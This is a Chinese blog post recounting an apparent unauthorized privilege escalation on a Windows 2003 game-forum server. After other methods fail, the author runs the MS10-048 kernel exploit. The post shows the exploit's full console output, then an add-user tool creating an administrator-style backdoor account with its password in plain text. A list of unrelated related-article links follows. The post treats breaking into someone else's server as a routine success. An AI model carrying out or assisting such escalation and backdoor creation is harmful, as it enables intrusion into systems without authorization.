今天搞了个wow的游戏论坛,服务器环境是win03 x86+iis6.0+php+mysql。

提权的时候各种无奈,mysql无权限,而且没root,试了几个别的方法都不行,实在没办法的时候,用MS10048试了下,成功了。

Dojibiron by Ronald Huizer, (c) master#h4cker.us  

[ ] Trying to allocate a page at NULL.

    [+] Allocated page at 0x0000000000000000 for 0x0000000000000001

[ ] Bootstrapping kernel resolver.

    Module ntoskrnl.exe at 0x0000000000BD0000

    Base of driver: 0xFFFFF80001000000

    [+] Success.

[ ] Resolving PsReferencePrimaryToken

    [+] Success: 0xFFFFF8000129FE50

[ ] Resolving PsInitialSystemProcess

    [+] Success: 0xFFFFF800011D1FB0

[ ] Resolving PsLookupProcessByProcessId

    [+] Success: 0xFFFFF80001288BC0

[ ] Resolving PsDereferencePrimaryToken

    [+] Success: 0xFFFFF80001311B40

[+] Handle table retrieval succeeded.

    Userspace handle table: 0x00000000006B0000

    Kernelspace handle table: 0xFFFFF97FF7990000

    Handle table entries: 1024

[ ] Allocating fake HEAD page.

    [+] Allocated page at 0x0000000004000000 for 0x00000000040001FF

[ ] Setting up CBT filter hook.

    [+] Success.

[ ] Creating evil window

    [+] Success.

[ ] Destroyed handle at: 0xFFFFF97FF7990FC0

    pHead:	0xFFFFF97FF906BA00

    pOwner:	0xFFFFFA80000E8D80

    bType:	0x01 - TYPE_WINDOW

    bFlags:	0x00 -

    wUniq:	0x0004

[ ] Trigger handle at: 0xFFFFF97FF7995AC0

    pHead:	0xFFFFF97FF90900A0

    pOwner:	0xFFFFFA80000E8D80

    bType:	0x01 - TYPE_WINDOW

    bFlags:	0x00 -

    wUniq:	0x0003

[ ] Writing pool addr to: 0xFFFFF97FF7990F7F

	~ MS10_048 X64 EXP        ~

	Need a girl to love   QQ 65665651 email master#h4cker.us 10010101010100010101010101010101100000110101001010111001010101010101101010101010101011111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	QQ 65665651 email master#h4cker.us 10010101010100010101010101010101100000110101001010111001010101010101101010101010101011111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	aster#h4cker.us 10010101010100010101010101010101100000110101001010111001010101010101101010101010101011111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	01010100010101010101010101100000110101001010111001010101010101101010101010101011111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	0101010101100000110101001010111001010101010101101010101010101011111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	1001010101010101101010101010101011111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	00000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	0101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	10101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	1001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	11111111110101010101111010101110101010101010101010101010111100000000000110

	110101010101010101010101010111100000000000110

	111100000000000110

	0000110

[ ] Checking the success flag.

    [+] Set to 2 exploit half succeeded

[ ] Destroying trigger window

    pHead:	0x00000000000003CA

    pOwner:	0x0000000000000000

    bType:	0x00 - TYPE_FREE

    bFlags:	0x00 -

    wUniq:	0x0004

[ ] Spawning half a shell...

    Command: D:\RECYCLER\add.exe

[+] Enjoy!

          ==========================================

              Api Add User Made By Cond0r

                    2011.3.20

              Adduser.exe UserName PassWord Group

          ==========================================

	 User List:

	-->  7ksf

	-->  ASPNET

	-->  Guestasdfa

	-->  IUSR_NJXW-12-5-2

	-->  IWAM_NJXW-12-5-2

	-->  SUPPORT_388945a0

	Group List:

	 --> Administrators

	 --> Backup Operators

	 --> Distributed COM Users

	 --> Guests

	 --> Network Configuration Operators

	 --> Performance Log Users

	 --> Performance Monitor Users

	 --> Power Users

	 --> Print Operators

	 --> Remote Desktop Users

	 --> Replicator

	 --> Users

	 --> HelpServicesGroup

	 --> IIS_WPG

	 --> TelnetClients 

 SuccessFul !!User "Cond0r" Pass "123!@#asdASD" Add User SuccessFul !!

利用api加用户工具,成功添加cond0r密码为123!@#asdASD的账户

MS10048依旧是Windows 2003 x86 的杀器的更多相关文章

  1. Windows 2003 FastCgi安装环境

    Windows 2003 IIS+PHP5.4.3 安装教程 一.准备相关组件 安装前,先安装IIS. 1.安装FastCgi for IIS6 Fastcgi官方网址是:http://www.iis ...

  2. Windows 2003上 SaltStack/Salt 和 psutil 可能存在的问题及解决

    今天把salt安装在windows 2003上,发现无法启动,随之而来的是一个有一个的坑,让我们一起逐个排查. 问题一(salt无法启动) salt无法启动,错误结果如图:

  3. Windows 2003】利用域&&组策略自动部署软件

    Windows 2003]利用域&&组策略自动部署软件 转自 http://hi.baidu.com/qu6zhi/item/4c0fa100dc768613cc34ead0 ==== ...

  4. 使用docker-compose 大杀器来部署服务 上

    使用docker-compose 大杀器来部署服务 上 我们都听过或者用过 docker,然而使用方式却是仅仅用手动的方式,这样去操作 docker 还是很原始. 好吧,可能在小白的眼中噼里啪啦的对着 ...

  5. Windows 2003 Server 标准版启动问题解决(资源转贴)

    维护的系统之一是部署在windows2003 Server标准版的服务器上,可能是由于某个应用问题,导致远程重启失败,害得我在机房呆了一早晨,可算是够折腾的.最后按照官方文档解决,刚放文档地址是:ht ...

  6. 使用docker-compose 大杀器来部署服务 上(转)

    使用docker-compose 大杀器来部署服务 上 我们都听过或者用过 docker,然而使用方式却是仅仅用手动的方式,这样去操作 docker 还是很原始. 好吧,可能在小白的眼中噼里啪啦的对着 ...

  7. 利用pentestbox打造ms17-010移动"杀器"

    本文首发Freebuf,属原创奖励计划,未经许可禁止转载. 链接:http://www.freebuf.com/articles/system/132274.html 一. 前言 前段时间Shadow ...

  8. [转]使用docker-compose 大杀器来部署服务 上

    本文转自:https://www.cnblogs.com/neptunemoon/p/6512121.html 使用docker-compose 大杀器来部署服务 上 我们都听过或者用过 docker ...

  9. 使用docker-compose 大杀器来部署服务

    使用docker-compose 大杀器来部署服务 上 我们都听过或者用过 docker,然而使用方式却是仅仅用手动的方式,这样去操作 docker 还是很原始. 好吧,可能在小白的眼中噼里啪啦的对着 ...

随机推荐

  1. linux防止sshd被爆破(安装denyhosts)

    这是一篇收集在日志里的文档,当初查看服务器sshd日志发现很多不明IP尝试登陆,因此想用什么办法阻止这样的事情发生.网上找了下用denyhosts可以解决这样的问题,因而也就将其收集在日志里了.由于时 ...

  2. 22.python笔记之web框架

    一.web框架本质 1.基于socket,自己处理请求 #!/usr/bin/env python3 #coding:utf8 import socket def handle_request(cli ...

  3. MFC 密码框

    使用Edit Control 在属性面板中,设置“行为”为password

  4. [火狐REST] 火狐REST 模拟 HTTP get, post请求

  5. Secure Socket Tunneling Protocol Service服务无法启动(win7)

    第一种方法: 1.确认一下服务都开启: Base Filtering Engine IKE and Authip IPsec Keying Module Ipsec Policy Agent Wind ...

  6. hadoop中常见元素的解释

    secondarynamenode 图: secondarynamenode根据文件的的大小对namenode的编辑日志和镜像日志 进行合并. 光从字面上来理解,很容易让一些初学者先入为主的认为:Se ...

  7. Storm工程创建

    1.创建maven项目: pom.xml: <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi=&quo ...

  8. Struts2文件上传和下载(原理)

    转自:http://zhou568xiao.iteye.com/blog/220732 1.    文件上传的原理:表单元素的enctype属性指定的是表单数据的编码方式,该属性有3个值:1)     ...

  9. 深入理解 KVC\KVO 实现机制 — KVO

    KVC和KVO都属于键值编程而且底层实现机制都是isa-swizzing,所以本来想放在一起讲的.但是篇幅有限所以就分成了两篇博文. KVC实现机制传送门 KVO概述 键值观察Key-Value-Ob ...

  10. 013_VM+WinDbg安装

    预计平均三天一课,录制过程中,大纲会实时更新(更改) 主讲:郁金香灬老师  QQ150330575 开发环境:VC6,VS2003,VS2008 www.yjxsoft.net www.yjxsoft ...